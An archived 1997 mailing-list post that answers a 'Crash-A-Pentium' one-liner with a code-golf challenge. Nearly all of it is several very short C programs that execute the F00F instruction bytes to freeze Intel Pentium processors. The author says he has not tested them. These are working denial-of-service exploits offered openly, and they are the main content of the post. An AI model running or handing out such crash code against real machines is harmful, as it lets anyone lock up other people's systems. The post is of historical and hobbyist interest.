smaller f00f.c

Adam Back aba at dcs.ex.ac.uk
Fri Nov 14 08:39:01 PST 1997




f00fie writes:
> In the grand tradition of RSA-in-3-lines-of-perl, we present
> Crash-A-Pentium-in-44-characters:
> 
>    main(){int i=0xc8c70ff0;void (*f)()=&i;f();}

Hey, challenge is on:

main(){int i=0xc8c70ff0;void (*f)()=&i;f();} /* f00fies 44 char */
main(){((int(*)())"\360\017\307\310")();}
main(){int i=0xc8c70ff0,(*f)()=&i;f();}
main(i){int(*f)()=&i;i=0xc8c70ff0;f();}
main(i){i=0xc8c70ff0;((int(*)())&i)();}
(*f)();main(i){f=&i;i=0xc8c70ff0;f();}
(*f)()="\360\017\307\310";main(){f();}       /* 38 chars */

Compiled with gcc.

(Note that I haven't tested them because I have an AMD k5 which
doesn't suffer from this bug -- perhaps someone with an Intel pentium
could try them).

Adam







More information about the cypherpunks-legacy mailing list